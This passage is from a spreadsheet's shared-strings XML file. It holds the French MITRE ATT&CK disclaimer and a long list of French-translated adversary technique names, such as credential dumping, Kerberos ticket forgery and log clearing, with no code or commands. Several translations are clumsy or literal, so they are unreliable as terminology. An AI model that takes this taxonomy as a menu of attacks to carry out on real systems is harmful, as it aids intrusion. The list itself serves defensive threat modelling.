MITRE ne prétend pas qu’ATT&amp;CK énumère toutes les possibilités pour les types d’actions et de comportements documentés dans le cadre de son modèle d’adversaire et de son cadre de techniques. L’utilisation des informations contenues dans ATT&amp;CK pour aborder ou couvrir des catégories complètes de techniques ne garantira pas une couverture défensive complète, car il peut y avoir des techniques non divulguées ou des variations de techniques existantes non documentées par ATT&amp;CK.
TOUS LES DOCUMENTS ET LES INFORMATIONS QU’ILS CONTIENNENT SONT FOURNIS « EN L’ÉTAT » ET LE CONTRIBUTEUR, L’ORGANISATION QU’IL REPRÉSENTE OU QUI EST PARRAINÉE PAR (LE CAS ÉCHÉANT), LA MITRE CORPORATION, SON CONSEIL D’ADMINISTRATION, SES DIRIGEANTS, SES AGENTS ET SES EMPLOYÉS, DÉCLINENT TOUTE GARANTIE, EXPRESSE OU IMPLICITE, Y COMPRIS, MAIS SANS S’Y LIMITER, TOUTE GARANTIE QUE L’UTILISATION DES INFORMATIONS QU’ILS CONTIENNENT N’ENFREINDRA AUCUN DROIT OU TOUTE GARANTIE IMPLICITE DE QUALITÉ MARCHANDE OU D’ADÉQUATION À UN PARTICULIER BUT.</t>
  </si>
  <si>
    <t>Injection supplémentaire de mémoire de fenêtre</t>
  </si>
  <si>
    <t>Tâche planifiée</t>
  </si>
  <si>
    <t>Archiver via l’utilitaire</t>
  </si>
  <si>
    <t>Instrumentation de gestion Windows</t>
  </si>
  <si>
    <t>Capture d’écran</t>
  </si>
  <si>
    <t>Stockage sans fichier</t>
  </si>
  <si>
    <t>Scripts d’initialisation de démarrage ou de connexion</t>
  </si>
  <si>
    <t>Adversaire au milieu</t>
  </si>
  <si>
    <t>Découverte du propriétaire du système/de l’utilisateur</t>
  </si>
  <si>
    <t>Acquérir des infrastructures</t>
  </si>
  <si>
    <t>Découverte de conteneurs et de ressources</t>
  </si>
  <si>
    <t>Sans serveur</t>
  </si>
  <si>
    <t>Encodage standard</t>
  </si>
  <si>
    <t>Charges utiles intégrées</t>
  </si>
  <si>
    <t>Modules d’authentification enfichables</t>
  </si>
  <si>
    <t>Rétablir l’instance Cloud</t>
  </si>
  <si>
    <t>Recueillir les informations sur l’hôte de la victime</t>
  </si>
  <si>
    <t>Certificats numériques</t>
  </si>
  <si>
    <t>Enregistrement de frappe</t>
  </si>
  <si>
    <t>Exclusions de fichiers/chemins d’accès</t>
  </si>
  <si>
    <t>Modification des autorisations de fichiers et de répertoires Linux et Mac</t>
  </si>
  <si>
    <t>Devinage du mot de passe</t>
  </si>
  <si>
    <t>Données techniques d’achat</t>
  </si>
  <si>
    <t>Vidage des informations d’identification du système d’exploitation</t>
  </si>
  <si>
    <t>Modules partagés</t>
  </si>
  <si>
    <t>Données du référentiel de configuration</t>
  </si>
  <si>
    <t>Effacement de la structure du disque</t>
  </si>
  <si>
    <t>Inondation directe du réseau</t>
  </si>
  <si>
    <t>Interception de chemin par la variable d’environnement PATH</t>
  </si>
  <si>
    <t>Accès direct aux volumes</t>
  </si>
  <si>
    <t>Intelligence artificielle</t>
  </si>
  <si>
    <t>Modifier la hiérarchie des ressources cloud</t>
  </si>
  <si>
    <t>Règles de masquage des e-mails</t>
  </si>
  <si>
    <t>Défiguration externe</t>
  </si>
  <si>
    <t>Fichier crypté/encodé</t>
  </si>
  <si>
    <t>Adresses IP</t>
  </si>
  <si>
    <t>Inondation d’épuisement du système d’exploitation</t>
  </si>
  <si>
    <t>Profil PowerShell</t>
  </si>
  <si>
    <t>Javascript</t>
  </si>
  <si>
    <t>Suppression déclenchée par le cycle de vie</t>
  </si>
  <si>
    <t>Création ou modification d’un processus système</t>
  </si>
  <si>
    <t>Services à distance externes</t>
  </si>
  <si>
    <t>Voler un cookie de session Web</t>
  </si>
  <si>
    <t>Travail d’orchestration de conteneur</t>
  </si>
  <si>
    <t>Algorithmes de génération de domaine</t>
  </si>
  <si>
    <t>Double extension de fichier</t>
  </si>
  <si>
    <t>Contourner le contrôle de compte d’utilisateur</t>
  </si>
  <si>
    <t>Pompage SMS</t>
  </si>
  <si>
    <t>Découverte de la connexion Internet</t>
  </si>
  <si>
    <t>Sudo et mise en cache Sudo</t>
  </si>
  <si>
    <t>Archivage via une méthode personnalisée</t>
  </si>
  <si>
    <t>Modifier l’infrastructure de calcul dans le cloud</t>
  </si>
  <si>
    <t>Périphériques réseau</t>
  </si>
  <si>
    <t>Publicité malveillante</t>
  </si>
  <si>
    <t>Découverte des groupes d’autorisations</t>
  </si>
  <si>
    <t>Collecte d’e-mails</t>
  </si>
  <si>
    <t>Gestionnaire de comptes de sécurité</t>
  </si>
  <si>
    <t>Micrologiciel du système</t>
  </si>
  <si>
    <t>Rechercher des sites Web appartenant à des victimes</t>
  </si>
  <si>
    <t>Groupes de cloud</t>
  </si>
  <si>
    <t>Faiblesse des autorisations de registre des services</t>
  </si>
  <si>
    <t>DNS/DNS passif</t>
  </si>
  <si>
    <t>Application Épuisement Inondation</t>
  </si>
  <si>
    <t>Compromettre les dépendances logicielles et les outils de développement</t>
  </si>
  <si>
    <t>Serveur DNS</t>
  </si>
  <si>
    <t>Effacement du disque</t>
  </si>
  <si>
    <t>API de métadonnées d’instance cloud</t>
  </si>
  <si>
    <t>Mémoire sécurisée</t>
  </si>
  <si>
    <t>Découverte de la stratégie de groupe</t>
  </si>
  <si>
    <t>Kit d’amorçage</t>
  </si>
  <si>
    <t>Données à partir d’un support amovible</t>
  </si>
  <si>
    <t>Transfert des données locales</t>
  </si>
  <si>
    <t>Correspondance du nom ou de l’emplacement légitime</t>
  </si>
  <si>
    <t>Manipulation des données stockées</t>
  </si>
  <si>
    <t>Craquage de mot de passe</t>
  </si>
  <si>
    <t>Collecte d’e-mails locaux</t>
  </si>
  <si>
    <t>Porte-clés</t>
  </si>
  <si>
    <t>Démarrage automatique de démarrage ou d’ouverture de session</t>
  </si>
  <si>
    <t>Affaiblir le chiffrement</t>
  </si>
  <si>
    <t>Jetons SAML</t>
  </si>
  <si>
    <t>Type de fichier Masquerade</t>
  </si>
  <si>
    <t>Arrêt du service</t>
  </si>
  <si>
    <t>Découverte du pilote de périphérique</t>
  </si>
  <si>
    <t>Compte de domaine</t>
  </si>
  <si>
    <t>Configuration active</t>
  </si>
  <si>
    <t>Masquer les artefacts</t>
  </si>
  <si>
    <t>Échange de données dynamique</t>
  </si>
  <si>
    <t>Fichier malveillant</t>
  </si>
  <si>
    <t>Identifier le tempo de l’entreprise</t>
  </si>
  <si>
    <t>Protocoles de publication/abonnement</t>
  </si>
  <si>
    <t>Matériel</t>
  </si>
  <si>
    <t>Entacher le contenu partagé</t>
  </si>
  <si>
    <t>Modification de la fiducie</t>
  </si>
  <si>
    <t>Cryptographie symétrique</t>
  </si>
  <si>
    <t>Compte local</t>
  </si>
  <si>
    <t>Comptes de médias sociaux</t>
  </si>
  <si>
    <t>Démarrage en mode sans échec</t>
  </si>
  <si>
    <t>Démarrage TFTP</t>
  </si>
  <si>
    <t>DNS à flux rapide</t>
  </si>
  <si>
    <t>Vérifications du système</t>
  </si>
  <si>
    <t>Groupes de domaines</t>
  </si>
  <si>
    <t>Vulnérabilités</t>
  </si>
  <si>
    <t>Lien vers le spearphishing</t>
  </si>
  <si>
    <t>Effacer les journaux système Linux ou Mac</t>
  </si>
  <si>
    <t>Exploitation d’une application ou d’un système</t>
  </si>
  <si>
    <t>Démarrage de l’application Office</t>
  </si>
  <si>
    <t>Rôles Cloud supplémentaires</t>
  </si>
  <si>
    <t>Processeurs d’impression</t>
  </si>
  <si>
    <t>Accessoire de spearphishing</t>
  </si>
  <si>
    <t>Charges utiles dépouillées</t>
  </si>
  <si>
    <t>Modèle objet composant</t>
  </si>
  <si>
    <t>Détournement d’ordre de recherche DLL</t>
  </si>
  <si>
    <t>Collecte automatisée</t>
  </si>
  <si>
    <t>Données du presse-papiers</t>
  </si>
  <si>
    <t>Système de fichiers Proc</t>
  </si>
  <si>
    <t>Gestionnaires de mots de passe</t>
  </si>
  <si>
    <t>Contournement de Gatekeeper</t>
  </si>
  <si>
    <t>Cible intempestive</t>
  </si>
  <si>
    <t>Découverte du service système</t>
  </si>
  <si>
    <t>Reniflage du réseau</t>
  </si>
  <si>
    <t>Signature de code</t>
  </si>
  <si>
    <t>Données du stockage dans le cloud</t>
  </si>
  <si>
    <t>Manipulation des données d’exécution</t>
  </si>
  <si>
    <t>Informations d’identification dans le registre</t>
  </si>
  <si>
    <t>Découverte du partage du réseau</t>
  </si>
  <si>
    <t>Découverte des périphériques</t>
  </si>
  <si>
    <t>Briser les arbres de processus</t>
  </si>
  <si>
    <t>Topologie de réseau</t>
  </si>
  <si>
    <t>Certificats de signature de code</t>
  </si>
  <si>
    <t>Modification des autorisations de fichiers et de répertoires Windows</t>
  </si>
  <si>
    <t>Compléments</t>
  </si>
  <si>
    <t>Découverte des informations système</t>
  </si>
  <si>
    <t>Protocole de la couche application</t>
  </si>
  <si>
    <t>Transfert de données à distance</t>
  </si>
  <si>
    <t>Rôles supplémentaires dans les clusters de conteneurs</t>
  </si>
  <si>
    <t>Tâche/travail planifié</t>
  </si>
  <si>
    <t>Dépendances d’approbation du réseau</t>
  </si>
  <si>
    <t>Amplification de la réflexion</t>
  </si>
  <si>
    <t>DLL de filtre de mot de passe</t>
  </si>
  <si>
    <t>Extensions de navigateur</t>
  </si>
  <si>
    <t>Inondation d’épuisement du service</t>
  </si>
  <si>
    <t>Compromettre la chaîne d’approvisionnement matérielle</t>
  </si>
  <si>
    <t>Fichiers Ccache</t>
  </si>
  <si>
    <t>Effacer l’historique et les configurations des connexions réseau</t>
  </si>
  <si>
    <t>Torréfaction AS-REP</t>
  </si>
  <si>
    <t>Serveur Privé Virtuel</t>
  </si>
  <si>
    <t>AutoHotKey et AutoIT</t>
  </si>
  <si>
    <t>Réduire l’espace clé</t>
  </si>
  <si>
    <t>Effacer l’historique des commandes</t>
  </si>
  <si>
    <t>Exécution indirecte de commandes</t>
  </si>
  <si>
    <t>Réplication via un support amovible</t>
  </si>
  <si>
    <t>Données du système local</t>
  </si>
  <si>
    <t>Débrouiller/décoder des fichiers ou des informations</t>
  </si>
  <si>
    <t>Règles Outlook</t>
  </si>
  <si>
    <t>Affaiblir les défenses</t>
  </si>
  <si>
    <t>Comptes cloud</t>
  </si>
  <si>
    <t>Comptes de messagerie</t>
  </si>
  <si>
    <t>Groupes locaux ou de domaines supplémentaires</t>
  </si>
  <si>
    <t>Télécharger un logiciel malveillant</t>
  </si>
  <si>
    <t>Compromission de la chaîne d’approvisionnement</t>
  </si>
  <si>
    <t>Exploiter une application publique</t>
  </si>
  <si>
    <t>Voler ou falsifier des billets Kerberos</t>
  </si>
  <si>
    <t>Informations d’identification à partir des magasins de mots de passe</t>
  </si>
  <si>
    <t>Exfiltration sur le service Web</t>
  </si>
  <si>
    <t>Logiciel d’accès à distance</t>
  </si>
  <si>
    <t>Domaines</t>
  </si>
  <si>
    <t>Archive via la bibliothèque</t>
  </si>
  <si>
    <t>Détournement d’exécution de thread</t>
  </si>
  <si>
    <t>Application : Flottage</t>
  </si>
  <si>
    <t>Identifiants non sécurisés</t>
  </si>
  <si>
    <t>Moniteurs de port</t>
  </si>
  <si>
    <t>Effacer les données de la boîte aux lettres</t>
  </si>
  <si>
    <t>Crochet de connexion</t>
  </si>
  <si>
    <t>Injection de contenu</t>
  </si>
  <si>
    <t>Injection de procédé</t>
  </si>
  <si>
    <t>Exfiltration sur Webhook</t>
  </si>
  <si>
    <t>Signalisation routière</t>
  </si>
  <si>
    <t>Connexions directes aux VM Cloud</t>
  </si>
  <si>
    <t>Exécution du proxy binaire système</t>
  </si>
  <si>
    <t>Jumeau maléfique</t>
  </si>
  <si>
    <t>Chargement du code réfléchissant</t>
  </si>
  <si>
    <t>Découverte Wi-Fi</t>
  </si>
  <si>
    <t>Exclusion mutuelle</t>
  </si>
  <si>
    <t>Ignorer les interruptions de processus</t>
  </si>
  <si>
    <t>Évasion vers l’hôte</t>
  </si>
  <si>
    <t>Modification du raccourci</t>
  </si>
  <si>
    <t>Découverte de la fenêtre d’application</t>
  </si>
  <si>
    <t>Compte de messagerie</t>
  </si>
  <si>
    <t>Évasion basée sur le temps</t>
  </si>
  <si>
    <t>Détournement SSH</t>
  </si>
  <si>
    <t>Désactiver la journalisation des événements Windows</t>
  </si>
  <si>
    <t>Transfert programmé</t>
  </si>
  <si>
    <t>Partages SMB/Windows Admin</t>
  </si>
  <si>
    <t>Image interne de l’implant</t>
  </si>
  <si>
    <t>Tunneling de protocole</t>
  </si>
  <si>
    <t>Panneau de configuration</t>
  </si>
  <si>
    <t>Traversée de traduction d’adresses réseau</t>
  </si>
  <si>
    <t>Outil de téléchargement</t>
  </si>
  <si>
    <t>Fournisseur de support de sécurité</t>
  </si>
  <si>
    <t>Utiliser un autre matériel d’authentification</t>
  </si>
  <si>
    <t>Fournisseurs d’informations sur les menaces</t>
  </si>
  <si>
    <t>Exfiltration sur un autre support réseau</t>
  </si>
  <si>
    <t>Vidage de la configuration du périphérique réseau</t>
  </si>
  <si>
    <t>Recueillir des informations sur l’identité de la victime</t>
  </si>
  <si>
    <t>Désactiver ou modifier le pare-feu du système</t>
  </si>
  <si>
    <t>Archiver les données collectées</t>
  </si>
  <si>
    <t>Détournement de SIP et de fournisseurs de confiance</t>
  </si>
  <si>
    <t>Détournement de session de navigateur</t>
  </si>
  <si>
    <t>Services à distance</t>
  </si>
  <si>
    <t>Protocoles de messagerie</t>
  </si>
  <si>
    <t>Identité hybride</t>
  </si>
  <si>
    <t>Analyse des vulnérabilités</t>
  </si>
  <si>
    <t>Rechercher dans des bases de données techniques ouvertes</t>
  </si>
  <si>
    <t>Applications de l’électron</t>
  </si>
  <si>
    <t>Désactiver ou modifier le système d’audit Linux</t>
  </si>
  <si>
    <t>Contrôleur de domaine non autorisé</t>
  </si>
  <si>
    <t>Modification de la politique de signature de code</t>
  </si>
  <si>
    <t>Déployer le conteneur</t>
  </si>
  <si>
    <t>Modifier le registre</t>
  </si>
  <si>
    <t>Lancer Daemon</t>
  </si>
  <si>
    <t>Découverte de l’infrastructure cloud</t>
  </si>
  <si>
    <t>Informations d’identification des navigateurs Web</t>
  </si>
  <si>
    <t>Interception de chemin par détournement d’ordre de recherche</t>
  </si>
  <si>
    <t>Dégradation</t>
  </si>
  <si>
    <t>Régions cloud inutilisées/non prises en charge</t>
  </si>
  <si>
    <t>Usurpation DHCP</t>
  </si>
  <si>
    <t>Détournement de session de service à distance</t>
  </si>
  <si>
    <t>Remplissage binaire</t>
  </si>
  <si>
    <t>Modification de la stratégie de groupe</t>
  </si>
  <si>
    <t>Découverte des informations du navigateur</t>
  </si>
  <si>
    <t>Clés privées</t>
  </si>
  <si>
    <t>Serveur</t>
  </si>
  <si>
    <t>Gestion à distance Windows</t>
  </si>
  <si>
    <t>Exfiltration via Bluetooth</t>
  </si>
  <si>
    <t>Comptes par défaut</t>
  </si>
  <si>
    <t>Fournisseurs de temps</t>
  </si>
  <si>
    <t>Piège</t>
  </si>
  <si>
    <t>Détournement dynamique de Linker</t>
  </si>
  <si>
    <t>Communication par le biais de supports amovibles</t>
  </si>
  <si>
    <t>Effacer les journaux d’événements Windows</t>
  </si>
  <si>
    <t>Empoisonnement LLMNR/NBT-NS et relais SMB</t>
  </si>
  <si>
    <t>Modification des autorisations de fichiers et de répertoires</t>
  </si>
  <si>
    <t>Mémoire LSASS</t>
  </si>
  <si>
    <t>Analyse active</t>
  </si>
  <si>
    <t>Mécanisme de contrôle de l’élévation des abus</t>
  </si>
  <si>
    <t>Créer un processus avec un jeton</t>
  </si>
  <si>
    <t>Setuid et Setgid</t>
  </si>
  <si>
    <t>Modèle objet de composant distribué</t>
  </si>
  <si>
    <t>Pulvérisation de mots de passe</t>
  </si>
  <si>
    <t>Proxy externe</t>
  </si>
  <si>
    <t>Capture du portail Web</t>
  </si>
  <si>
    <t>Adresses e-mail</t>
  </si>
  <si>
    <t>Voix de spearphishing</t>
  </si>
  <si>
    <t>Informations d’identification de domaine mises en cache</t>
  </si>
  <si>
    <t>Clés autorisées SSH</t>
  </si>
  <si>
    <t>Appliances de sécurité réseau</t>
  </si>
  <si>
    <t>Injection d’options d’exécution de fichier image</t>
  </si>
  <si>
    <t>Moteurs</t>
  </si>
  <si>
    <t>Relations d’affaires</t>
  </si>
  <si>
    <t>Accès cloud avec élévation de privilèges temporaire</t>
  </si>
  <si>
    <t>Capture vidéo</t>
  </si>
  <si>
    <t>Processus Doppelgänging</t>
  </si>
  <si>
    <t>Découverte de la configuration réseau du système</t>
  </si>
  <si>
    <t>Supprimer une instance Cloud</t>
  </si>
  <si>
    <t>Référentiels de code</t>
  </si>
  <si>
    <t>Faiblesse des autorisations de fichiers du programme d’installation de l’exécutable</t>
  </si>
  <si>
    <t>Caractéristiques d’accessibilité</t>
  </si>
  <si>
    <t>Détournement de bande passante</t>
  </si>
  <si>
    <t>Découverte de compte</t>
  </si>
  <si>
    <t>Procuration</t>
  </si>
  <si>
    <t>Interpréteur de commandes et de scripts</t>
  </si>
  <si>
    <t>Blocage de l’indicateur</t>
  </si>
  <si>
    <t>Noms des employés</t>
  </si>
  <si>
    <t>Découverte de l’approbation de domaine</t>
  </si>
  <si>
    <t>Billet d’or</t>
  </si>
  <si>
    <t>Exfiltration automatisée</t>
  </si>
  <si>
    <t>Désactiver ou modifier le pare-feu cloud</t>
  </si>
  <si>
    <t>Remplacement de droite à gauche</t>
  </si>
  <si>
    <t>Micrologiciel des composants</t>
  </si>
  <si>
    <t>Retrait de l’indicateur</t>
  </si>
  <si>
    <t>Exfiltration via un protocole non-C2 crypté symétrique</t>
  </si>
  <si>
    <t>Macros de modèles Office</t>
  </si>
  <si>
    <t>Confluent</t>
  </si>
  <si>
    <t>Passez le billet</t>
  </si>
  <si>
    <t>Commande d’administration de conteneur</t>
  </si>
  <si>
    <t>Découverte de fichiers et de répertoires</t>
  </si>
  <si>
    <t>Résolution dynamique</t>
  </si>
  <si>
    <t>Tâche ou service de mascarade</t>
  </si>
  <si>
    <t>Appel de procédure asynchrone</t>
  </si>
  <si>
    <t>Duplication du trafic</t>
  </si>
  <si>
    <t>Modification du fichier Plist</t>
  </si>
  <si>
    <t>DLL AppCert</t>
  </si>
  <si>
    <t>Règle de transfert d’e-mail</t>
  </si>
  <si>
    <t>Données mises en scène</t>
  </si>
  <si>
    <t>Voler ou falsifier des certificats d’authentification</t>
  </si>
  <si>
    <t>Enregistrement de l’appareil</t>
  </si>
  <si>
    <t>Découverte des connexions réseau système</t>
  </si>
  <si>
    <t>Compromettre l’infrastructure</t>
  </si>
  <si>
    <t>Contournement de la marque du Web</t>
  </si>
  <si>
    <t>Désactiver le matériel cryptographique</t>
  </si>
  <si>
    <t>Pré-démarrage du système d’exploitation</t>
  </si>
  <si>
    <t>Construire une image sur l’hôte</t>
  </si>
  <si>
    <t>Injection exécutable portable</t>
  </si>
  <si>
    <t>Comptes compromis</t>
  </si>
  <si>
    <t>Lancement ctl</t>
  </si>
  <si>
    <t>CLI de périphérique réseau</t>
  </si>
  <si>
    <t>Histoire de la fête</t>
  </si>
  <si>
    <t>Attaque de rétrogradation</t>
  </si>
  <si>
    <t>Virtualisation/Évasion du bac à sable</t>
  </si>
  <si>
    <t>Service web</t>
  </si>
  <si>
    <t>Informations d’identification dans les fichiers</t>
  </si>
  <si>
    <t>Calcul DNS</t>
  </si>
  <si>
    <t>Éléments de connexion</t>
  </si>
  <si>
    <t>Capacités de la scène</t>
  </si>
  <si>
    <t>Cible du lien</t>
  </si>
  <si>
    <t>Canaux à plusieurs étages</t>
  </si>
  <si>
    <t>Vol financier</t>
  </si>
  <si>
    <t>Garde-fous d’exécution</t>
  </si>
  <si>
    <t>Découverte d’objets de stockage dans le cloud</t>
  </si>
  <si>
    <t>Énumération des journaux</t>
  </si>
  <si>
    <t>Usurpation d’identité/vol de jetons</t>
  </si>
  <si>
    <t>Exfiltration vers le dépôt de code</t>
  </si>
  <si>
    <t>Cognement de port</t>
  </si>
  <si>
    <t>Contrebande d’icônes LNK</t>
  </si>
  <si>
    <t>Voler le jeton d’accès à l’application</t>
  </si>
  <si>
    <t>Informations d’identification cloud supplémentaires</t>
  </si>
  <si>
    <t>Exécution par l’utilisateur</t>
  </si>
  <si>
    <t>Défiguration interne</t>
  </si>
  <si>
    <t>Utilisateurs masqués</t>
  </si>
  <si>
    <t>Créer et emprunter l’identité d’un jeton</t>
  </si>
  <si>
    <t>Préférences de stratégie de groupe</t>
  </si>
  <si>
    <t>Exfiltration via un protocole non-C2 chiffré asymétrique</t>
  </si>
  <si>
    <t>Compte Cloud</t>
  </si>
  <si>
    <t>Découverte des processus</t>
  </si>
  <si>
    <t>Journalisation de l’historique des commandes Impair</t>
  </si>
  <si>
    <t>DLL du fournisseur de réseau</t>
  </si>
  <si>
    <t>Abonnement aux événements Windows Management Instrumentation</t>
  </si>
  <si>
    <t>CDN</t>
  </si>
  <si>
    <t>Vérifications basées sur l’activité de l’utilisateur</t>
  </si>
  <si>
    <t>Détournement de services cloud</t>
  </si>
  <si>
    <t>Outils de déploiement de logiciels</t>
  </si>
  <si>
    <t>Exfiltration sur le canal C2</t>
  </si>
  <si>
    <t>Usurpation de PID parent</t>
  </si>
  <si>
    <t>Recueillir des informations sur l’organisation des victimes</t>
  </si>
  <si>
    <t>Falsifier les informations d’identification Web</t>
  </si>
  <si>
    <t>Génération de demandes d’authentification multifacteur</t>
  </si>
  <si>
    <t>Binaire du logiciel hôte de compromis</t>
  </si>
  <si>
    <t>Modifier l’association de fichiers par défaut</t>
  </si>
  <si>
    <t>Détournement de VDSO</t>
  </si>
  <si>
    <t>Protocoles de transfert de fichiers</t>
  </si>
  <si>
    <t>Exploitation pour l’accès aux identifiants</t>
  </si>
  <si>
    <t>Émond</t>
  </si>
  <si>
    <t>Communication à sens unique</t>
  </si>
  <si>
    <t>Recueillir des informations sur le réseau des victimes</t>
  </si>
  <si>
    <t>Exploitation des services à distance</t>
  </si>
  <si>
    <t>Spearphishing interne</t>
  </si>
  <si>
    <t>Faiblesse des autorisations de fichiers de services</t>
  </si>
  <si>
    <t>Clés d’exécution du registre/dossier de démarrage</t>
  </si>
  <si>
    <t>Relation de confiance</t>
  </si>
  <si>
    <t>Groupes locaux</t>
  </si>
  <si>
    <t>Recherche de sites Web/domaines ouverts</t>
  </si>
  <si>
    <t>Manipulation de compte</t>
  </si>
  <si>
    <t>Exfiltration par un protocole alternatif</t>
  </si>
  <si>
    <t>Modules et extensions du noyau</t>
  </si>
  <si>
    <t>Capture d’entrée de l’interface graphique</t>
  </si>
  <si>
    <t>Outil</t>
  </si>
  <si>
    <t>Exfiltration via USB</t>
  </si>
  <si>
    <t>Recherche de sources fermées</t>
  </si>
  <si>
    <t>Minuteries Systemd</t>
  </si>
  <si>
    <t>Hameçonnage</t>
  </si>
  <si>
    <t>Fichier HTML compilé</t>
  </si>
  <si>
    <t>Détournement de calcul</t>
  </si>
  <si>
    <t>Suppression de la connexion de partage réseau</t>
  </si>
  <si>
    <t>Proxy multi-sauts</t>
  </si>
  <si>
    <t>Formulaires Outlook</t>
  </si>
  <si>
    <t>Désactiver ou modifier les outils</t>
  </si>
  <si>
    <t>Manipulation des données</t>
  </si>
  <si>
    <t>Communication inter-processus</t>
  </si>
  <si>
    <t>Obscurcissement des données</t>
  </si>
  <si>
    <t>Données du Drive partagé sur le réseau</t>
  </si>
  <si>
    <t>Modifier l’image système</t>
  </si>
  <si>
    <t>Détourner le flux d’exécution</t>
  </si>
  <si>
    <t>Retrait de l’indicateur des outils</t>
  </si>
  <si>
    <t>Image malveillante</t>
  </si>
  <si>
    <t>Service de conteneurs</t>
  </si>
  <si>
    <t>Comptes valides</t>
  </si>
  <si>
    <t>Port non standard</t>
  </si>
  <si>
    <t>Évidage du processus</t>
  </si>
  <si>
    <t>Exploitation à des fins d’élévation de privilèges</t>
  </si>
  <si>
    <t>Recherche de ressources</t>
  </si>
  <si>
    <t>Suppression de l’accès au compte</t>
  </si>
  <si>
    <t>Bourrage d’identifiants</t>
  </si>
  <si>
    <t>Fichiers ou informations obscurcis</t>
  </si>
  <si>
    <t>Authentification multifacteur</t>
  </si>
  <si>
    <t>Collecte d’e-mails à distance</t>
  </si>
  <si>
    <t>Composants IIS</t>
  </si>
  <si>
    <t>Signature de code non valide</t>
  </si>
  <si>
    <t>Exécuter une instance virtuelle</t>
  </si>
  <si>
    <t>Code polymorphe</t>
  </si>
  <si>
    <t>Découverte de la politique de mot de passe</t>
  </si>
  <si>
    <t>Exécution déclenchée par un événement</t>
  </si>
  <si>
    <t>Authentification forcée</t>
  </si>
  <si>
    <t>Injection d’historique SID</t>
  </si>
  <si>
    <t>Franchissement des limites du réseau</t>
  </si>
  <si>
    <t>Données chiffrées pour l’impact</t>
  </si>
  <si>
    <t>Subvertir les contrôles de confiance</t>
  </si>
  <si>
    <t>Exécution élevée avec invite</t>
  </si>
  <si>
    <t>Microprogramme</t>
  </si>
  <si>
    <t>Canal crypté</t>
  </si>
  <si>
    <t>Package d’authentification</t>
  </si>
  <si>
    <t>Régsvr32</t>
  </si>
  <si>
    <t>Exfiltration vers des sites de stockage de texte</t>
  </si>
  <si>
    <t>Logiciel</t>
  </si>
  <si>
    <t>Capture d’entrée</t>
  </si>
  <si>
    <t>Médias sociaux</t>
  </si>
  <si>
    <t>Logiciel de gestion de la relation client</t>
  </si>
  <si>
    <t>Détournement de modèle objet composant</t>
  </si>
  <si>
    <t>Pouvoirs</t>
  </si>
  <si>
    <t>Compromettre la chaîne d’approvisionnement logicielle</t>
  </si>
  <si>
    <t>Renommer les utilitaires système</t>
  </si>
  <si>
    <t>Communication bidirectionnelle</t>
  </si>
  <si>
    <t>Exploitation pour l’exécution par le client</t>
  </si>
  <si>
    <t>Balayage de listes de mots</t>
  </si>
  <si>
    <t>Alertes de sécurité d’usurpation d’identité</t>
  </si>
  <si>
    <t>Page d’accueil Outlook</t>
  </si>
  <si>
    <t>Cryptographie asymétrique</t>
  </si>
  <si>
    <t>Exfiltration vers le stockage en nuage</t>
  </si>
  <si>
    <t>Transfert latéral de l’outil</t>
  </si>
  <si>
    <t>Interception de chemin par chemin non guillemé</t>
  </si>
  <si>
    <t>Installer le certificat numérique</t>
  </si>
  <si>
    <t>Éléments de démarrage</t>
  </si>
  <si>
    <t>Découverte du langage système</t>
  </si>
  <si>
    <t>Protocole de couche non-application</t>
  </si>
  <si>
    <t>Stéganographie</t>
  </si>
  <si>
    <t>Usurpation d’identité de protocole ou de service</t>
  </si>
  <si>
    <t>Registre des requêtes</t>
  </si>
  <si>
    <t>Limites de taille de transfert de données</t>
  </si>
  <si>
    <t>Comptes de domaine</t>
  </si>
  <si>
    <t>Installer le certificat racine</t>
  </si>
  <si>
    <t>Script d’ouverture de session réseau</t>
  </si>
  <si>
    <t>Déni de service du point de terminaison</t>
  </si>
  <si>
    <t>Compiler après la livraison</t>
  </si>
  <si>
    <t>Découverte de l’emplacement du système</t>
  </si>
  <si>
    <t>Piétinement VBA</t>
  </si>
  <si>
    <t>Emplois BITS</t>
  </si>
  <si>
    <t>Imitation</t>
  </si>
  <si>
    <t>Modifier les configurations de Cloud Compute</t>
  </si>
  <si>
    <t>Façade de domaine</t>
  </si>
  <si>
    <t>Empoisonnement du cache ARP</t>
  </si>
  <si>
    <t>Désactiver ou modifier les journaux cloud</t>
  </si>
  <si>
    <t>Découverte de logiciels de sécurité</t>
  </si>
  <si>
    <t>Fenêtre cachée</t>
  </si>
  <si>
    <t>ClicUne fois</t>
  </si>
  <si>
    <t>Déplacer les logiciels malveillants</t>
  </si>
  <si>
    <t>Identifier les rôles</t>
  </si>
  <si>
    <t>Encodage des données</t>
  </si>
  <si>
    <t>DLL AppInit</t>
  </si>
  <si>
    <t>Hameçonnage pour obtenir des informations</t>
  </si>
  <si>
    <t>Détournement de ressources</t>
  </si>
  <si>
    <t>Établir des comptes</t>
  </si>
  <si>
    <t>Obtenir des capacités</t>
  </si>
  <si>
    <t>Économiseur d’écran</t>
  </si>
  <si>
    <t>Politiques d’accès conditionnel</t>
  </si>
  <si>
    <t>Créer une instance Cloud</t>
  </si>
  <si>
    <t>Magasins de gestion des secrets dans le cloud</t>
  </si>
  <si>
    <t>Manipulation des données transmises</t>
  </si>
  <si>
    <t>/etc/passwd et /etc/shadow</t>
  </si>
  <si>
    <t>Agent de lancement</t>
  </si>
  <si>
    <t>Services système</t>
  </si>
  <si>
    <t>Shell de commande Windows</t>
  </si>
  <si>
    <t>Mémoire Proc</t>
  </si>
  <si>
    <t>Acquérir l’accès</t>
  </si>
  <si>
    <t>Corriger l’image du système</t>
  </si>
  <si>
    <t>Billet d’argent</t>
  </si>
  <si>
    <t>Données provenant de référentiels d’informations</t>
  </si>
  <si>
    <t>Persistance évidente</t>
  </si>
  <si>
    <t>Gestionnaire d’informations d’identification Windows</t>
  </si>
  <si>
    <t>Nom du compte Masquerade</t>
  </si>
  <si>
    <t>Ajouts matériels</t>
  </si>
  <si>
    <t>Composant logiciel serveur</t>
  </si>
  <si>
    <t>Destruction des données</t>
  </si>
  <si>
    <t>Encodage non standard</t>
  </si>
  <si>
    <t>Authentification du contrôleur de domaine</t>
  </si>
  <si>
    <t>Transfert de données vers un compte cloud</t>
  </si>
  <si>
    <t>Contrebande HTML</t>
  </si>
  <si>
    <t>Chiffrement réversible</t>
  </si>
  <si>
    <t>Obfuscation de commande</t>
  </si>
  <si>
    <t>Suppression de fichiers</t>
  </si>
  <si>
    <t>Compromis de conduite</t>
  </si>
  <si>
    <t>Déni de service réseau</t>
  </si>
  <si>
    <t>Commande d’administration du cloud</t>
  </si>
  <si>
    <t>Packages d’installation</t>
  </si>
  <si>
    <t>Analyse des blocs IP</t>
  </si>
  <si>
